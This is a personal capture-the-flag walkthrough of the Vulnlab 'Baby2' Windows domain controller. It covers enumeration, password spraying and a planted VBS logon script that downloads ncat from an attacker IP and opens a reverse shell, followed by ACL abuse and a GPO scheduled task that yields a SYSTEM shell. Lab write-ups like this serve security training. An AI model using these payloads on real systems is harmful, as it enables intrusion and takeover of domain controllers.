Here is my note on BABY2 box from Vulnlab.
BABY2: 10.10.81.76
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-31 14:59:03Z)
No ASREPROASTING.
sudo impacket-GetUserSPNs 'baby2.vl/Carl.Moore:Carl.Moore' -dc-ip 10.10.81.76 -request
No Kerberoasting.
135/tcp open msrpc Microsoft Windows RPC
┌──(root㉿kali)-[/home/…/BABY2/10.10.81.76/apps/dev]
└─# rpcclient 10.10.81.76 -U "guest%guest" -c "enumdomusers;quit"
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
┌──(root㉿kali)-[/home/…/BABY2/10.10.81.76/apps/dev]
└─# rpcclient 10.10.81.76 -U "guest%" -c "enumdomusers;quit"
result was NT_STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/…/BABY2/10.10.81.76/apps/dev]
└─# rpcclient 10.10.81.76 -U "Guest%" -c "enumdomusers;quit"
result was NT_STATUS_ACCESS_DENIED
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.baby2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.baby2.vl
| Not valid before: 2024-10-31T14:48:05
|_Not valid after: 2025-10-31T14:48:05
ldap v3 = NOPE unless account acquired.
ldapsearch -H ldap://10.10.81.76 -x -W -D "Carl.Moore@baby2.vl" -b "dc=baby2,dc=vl" '(objectClass=person)' - WORKS !
ldapsearch -H ldap://10.10.81.76 -x -W -D "Carl.Moore@baby2.vl" -b "dc=baby2,dc=vl" '(objectClass=person)' > ldap-people.txt
#No Password Disclose unfortunately.
445/tcp open microsoft-ds?
smbclient -N -L 10.10.81.76
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
apps Disk
C$ Disk Default share
docs Disk
homes Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
[+] IP: 10.10.81.76:445 Name: 10.10.81.76 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
apps READ ONLY #After homes.
C$ NO ACCESS Default share
docs NO ACCESS
homes READ, WRITE #Afer IPC. Empty User Directory = NOPE !
IPC$ READ ONLY Remote IPC #IPC USERS as usual.
NETLOGON READ ONLY Logon server share
SYSVOL NO ACCESS Logon server share
[*] Closed 1 connections
sudo lookupsid.py Guest@10.10.81.76 | tee usernames
grep SidTypeUser usernames | awk '{print $2}' | cut -d ""\\"" -f2 > users.txt
┌──(root㉿kali)-[/home/…/VL/BABY2/10.10.81.76/apps]
└─# smbclient \\\\10.10.81.76\\apps -U "guest%"
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Sep 7 15:12:59 2023
.. D 0 Tue Aug 22 16:10:21 2023
dev D 0 Thu Sep 7 15:13:50 2023
6126847 blocks of size 4096. 2017040 blocks available
smb: \> mask ""
smb: \> recurse
smb: \> prompt
smb: \> mget *
getting file \dev\CHANGELOG of size 108 as dev/CHANGELOG (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \dev\login.vbs.lnk of size 1800 as dev/login.vbs.lnk (3.7 KiloBytes/sec) (average 2.0 KiloBytes/sec)
smb: \> exit
┌──(root㉿kali)-[/home/…/VL/BABY2/10.10.81.76/apps]
└─# tree -r .
.
└── dev
├── login.vbs.lnk
└── CHANGELOG
crackmapexec smb 10.10.81.76 -u users.txt -p users.txt --no-bruteforce --continue-on-success | grep '[+]'
SMB 10.10.81.76 445 DC [+] baby2.vl\Carl.Moore:Carl.Moore
SMB 10.10.81.76 445 DC [+] baby2.vl\library:library
crackmapexec smb 10.10.81.76 -u users.txt -p '' --no-bruteforce --continue-on-success | grep '[+]'
SMB 10.10.81.76 445 DC [+] baby2.vl\Guest:
CREDS DISCOVERED !
baby2.vl\Carl.Moore:Carl.Moore
baby2.vl\library:library
baby2.vl\Guest:
┌──(root㉿kali)-[/home/kali/VL/BABY2/10.10.81.76]
└─# crackmapexec smb 10.10.81.76 -u Carl.Moore -p Carl.Moore --shares
SMB 10.10.81.76 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB 10.10.81.76 445 DC [+] baby2.vl\Carl.Moore:Carl.Moore
SMB 10.10.81.76 445 DC [+] Enumerated shares
SMB 10.10.81.76 445 DC Share Permissions Remark
SMB 10.10.81.76 445 DC ----- ----------- ------
SMB 10.10.81.76 445 DC ADMIN$ Remote Admin
SMB 10.10.81.76 445 DC apps READ,WRITE
SMB 10.10.81.76 445 DC C$ Default share
SMB 10.10.81.76 445 DC docs READ,WRITE
SMB 10.10.81.76 445 DC homes READ,WRITE
SMB 10.10.81.76 445 DC IPC$ READ Remote IPC
SMB 10.10.81.76 445 DC NETLOGON READ Logon server share
SMB 10.10.81.76 445 DC SYSVOL READ Logon server share
┌──(root㉿kali)-[/home/kali/VL/BABY2/10.10.81.76]
└─# crackmapexec smb 10.10.81.76 -u library -p library --shares
SMB 10.10.81.76 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB 10.10.81.76 445 DC [+] baby2.vl\library:library
SMB 10.10.81.76 445 DC [+] Enumerated shares
SMB 10.10.81.76 445 DC Share Permissions Remark
SMB 10.10.81.76 445 DC ----- ----------- ------
SMB 10.10.81.76 445 DC ADMIN$ Remote Admin
SMB 10.10.81.76 445 DC apps READ,WRITE
SMB 10.10.81.76 445 DC C$ Default share
SMB 10.10.81.76 445 DC docs READ,WRITE #EMPTY.
SMB 10.10.81.76 445 DC homes READ,WRITE #EMPTY.
SMB 10.10.81.76 445 DC IPC$ READ Remote IPC #DONE
SMB 10.10.81.76 445 DC NETLOGON READ Logon server share #DON'T BOTHER.
SMB 10.10.81.76 445 DC SYSVOL READ Logon server share #DONE
Remember user home directory ? Check out Carl.Moore folder as Carl.Moore user.
#Never mind, still empty as usual.
login.vbs.lnk mentioned about SYSVOL scripts so let's check that out.
┌──(root㉿kali)-[/home/…/VL/BABY2/10.10.81.76/SYSVOL]
└─# smbclient \\\\10.10.81.76\\SYSVOL -U "Carl.Moore%Carl.Moore"
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Aug 22 13:37:36 2023
.. D 0 Tue Aug 22 13:37:36 2023
baby2.vl Dr 0 Tue Aug 22 13:37:36 2023
6126847 blocks of size 4096. 2016048 blocks available
smb: \> cd baby2.vl
smb: \baby2.vl\> dir
. D 0 Tue Aug 22 13:43:55 2023
.. D 0 Tue Aug 22 13:37:36 2023
DfsrPrivate DHSr 0 Tue Aug 22 13:43:55 2023
Policies D 0 Tue Aug 22 13:37:41 2023
scripts D 0 Tue Aug 22 15:28:27 2023
6126847 blocks of size 4096. 2016048 blocks available
smb: \baby2.vl\> cd scripts
dismb: \baby2.vl\scripts\> dir
. D 0 Tue Aug 22 15:28:27 2023
.. D 0 Tue Aug 22 13:43:55 2023
login.vbs A 992 Sat Sep 2 10:55:51 2023
6126847 blocks of size 4096. 2016047 blocks available
smb: \baby2.vl\scripts\> get login.vbs
getting file \baby2.vl\scripts\login.vbs of size 992 as login.vbs (1.1 KiloBytes/sec) (average 1.1 KiloBytes/sec)
smb: \baby2.vl\scripts\> exit
login.vbs doesn't have credential unfortunately.
No interesting scripts from SYSVOL other than login.vbs unfortunately.
.lnk ? - Looks like I have to guess some files to gather hashes with Responder.
Well almost but only one file works and that is .vbs file.
Both Carl.Moore and library can modify to login.vbs and upload to scripts folder of SYSVOL share.
Looking back at CHANGELOG:
cat CHANGELOG
[0.2]
- Added automated drive mapping
[0.1]
- Rolled out initial version of the domain logon script
Basically, there will be one user to read and execute this login.vbs file so we are put malicious payload to it.
Set oShell = CreateObject("Wscript.Shell")
oShell.run "cmd.exe /c curl 10.8.0.136/nc64.exe -o C:\Windows\Temp\nc64.exe"
oShell.run "cmd.exe /c C:\Windows\Temp\nc64.exe 10.8.0.136 2222 -e cmd.exe"
Set oShell = CreateObject("Wscript.Shell")
oShell.run "cmd.exe /c curl 10.8.0.71/ncat.exe -o C:\Windows\Temp\ncat.exe"
oShell.run "cmd.exe /c C:\Windows\Temp\ncat.exe 10.8.0.71 1234 -e cmd.exe"
Put it in login.vbs:
Sub MapNetworkShare(sharePath, driveLetter)
Dim objNetwork
Set objNetwork = CreateObject("WScript.Network")
Set oShell = CreateObject("Wscript.Shell")
oShell.run "cmd.exe /c curl 10.8.0.71/ncat.exe -o C:\Windows\Temp\ncat.exe"
oShell.run "cmd.exe /c C:\Windows\Temp\ncat.exe 10.8.0.71 1234 -e cmd.exe"
' Check if the drive is already mapped
Dim mappedDrives
Set mappedDrives = objNetwork.EnumNetworkDrives
Dim isMapped
isMapped = False
For i = 0 To mappedDrives.Count - 1 Step 2
[SNIP]
https://sc.vern.cc/@arz101/vulnlab-baby2-a3159c0f705a
Then upload it to scripts folder of SYSVOL share and wait to gain shell:
sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.81.76] 53963
Microsoft Windows [Version 10.0.20348.1906]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
baby2\amelia.griffiths
USER-SHELL !
C:\>whoami
whoami
baby2\amelia.griffiths
C:\>hostname
hostname
dc
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is E6F3-2485
Directory of C:\
05/08/2021 01:20 AM <DIR> PerfLogs
08/27/2023 10:02 AM <DIR> Program Files
08/22/2023 10:30 AM <DIR> Program Files (x86)
08/22/2023 01:10 PM <DIR> shares
08/22/2023 12:35 PM <DIR> temp
08/22/2023 12:51 PM 36 user.txt
08/22/2023 12:54 PM <DIR> Users
08/27/2023 10:12 AM <DIR> Windows
1 File(s) 36 bytes
7 Dir(s) 8,248,766,464 bytes free
C:\>type user.txt
type user.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
PRIV ESC:
BloodHound Data:
amelia.griffiths -> Member of LEGACY group -> WriteDACL and WriteOwner -> GPOADM User:
Add-DomainObjectAcl -PrincipalIdentity amelia.griffiths -TargetIdentity GPOADM -Rights All
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity GPOADM -AccountPassword $UserPassword
crackmapexec smb 10.10.81.76 -u 'GPOADM' -p 'Password123!'
SMB 10.10.81.76 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB 10.10.81.76 445 DC [+] baby2.vl\GPOADM:Password123!
-WORKS !
GPOADM -> GenericAll -> Default Domain Policy -> GPLink -> BABY2.VL:
GPOABUSE !
python3 pygpoabuse.py 'baby2.vl'/'GPOADM':'Password123!' -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9"
┌──(root㉿kali)-[/home/kali/Kali-Tools/attacktive-directory-tools/pyGPOAbuse]
└─# python3 pygpoabuse.py 'baby2.vl'/'GPOADM':'Password123!' -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9"
SUCCESS:root:ScheduledTask TASK_41bee3dc created!
[+] ScheduledTask TASK_41bee3dc created!
gpupdate /force
python3 pygpoabuse.py 'baby2.vl'/'GPOADM':'Password123!' -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" -dc-ip 10.10.81.76 -f -command "C:\Windows\Temp\ncat.exe -nv 10.8.0.71 4444 -e CMD"
┌──(root㉿kali)-[/home/kali/Kali-Tools/attacktive-directory-tools/pyGPOAbuse]
└─# python3 pygpoabuse.py 'baby2.vl'/'GPOADM':'Password123!' -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" -dc-ip 10.10.81.76 -f -command "C:\Windows\Temp\ncat.exe -nv 10.8.0.71 4444 -e CMD"
SUCCESS:root:ScheduledTask TASK_ddde254c created!
[+] ScheduledTask TASK_ddde254c created!
Wait for shell:
sudo rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.81.76] 58481
Microsoft Windows [Version 10.0.20348.1906]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>hostname
hostname
dc
SYSTEM-SHELL !
C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>hostname
hostname
dc
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is E6F3-2485
Directory of C:\Users\Administrator\Desktop
08/22/2023 12:50 PM <DIR> .
08/22/2023 10:08 AM <DIR> ..
08/22/2023 12:51 PM 36 root.txt
1 File(s) 36 bytes
2 Dir(s) 8,233,865,216 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.baby2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.baby2.vl
| Not valid before: 2024-10-31T14:48:05
|_Not valid after: 2025-10-31T14:48:05
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.baby2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.baby2.vl
| Not valid before: 2024-10-31T14:48:05
|_Not valid after: 2025-10-31T14:48:05
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.baby2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.baby2.vl
| Not valid before: 2024-10-31T14:48:05
|_Not valid after: 2025-10-31T14:48:05
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-10-31T15:00:25+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=dc.baby2.vl
| Not valid before: 2024-10-30T14:56:54
|_Not valid after: 2025-05-01T14:56:54
| rdp-ntlm-info:
| Target_Name: BABY2
| NetBIOS_Domain_Name: BABY2
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: baby2.vl
| DNS_Computer_Name: dc.baby2.vl
| DNS_Tree_Name: baby2.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-10-31T14:59:45+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
51867/tcp open msrpc Microsoft Windows RPC
51889/tcp open msrpc Microsoft Windows RPC
53225/tcp open msrpc Microsoft Windows RPC
53232/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
| smb2-time:
| date: 2024-10-31T14:59:48
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required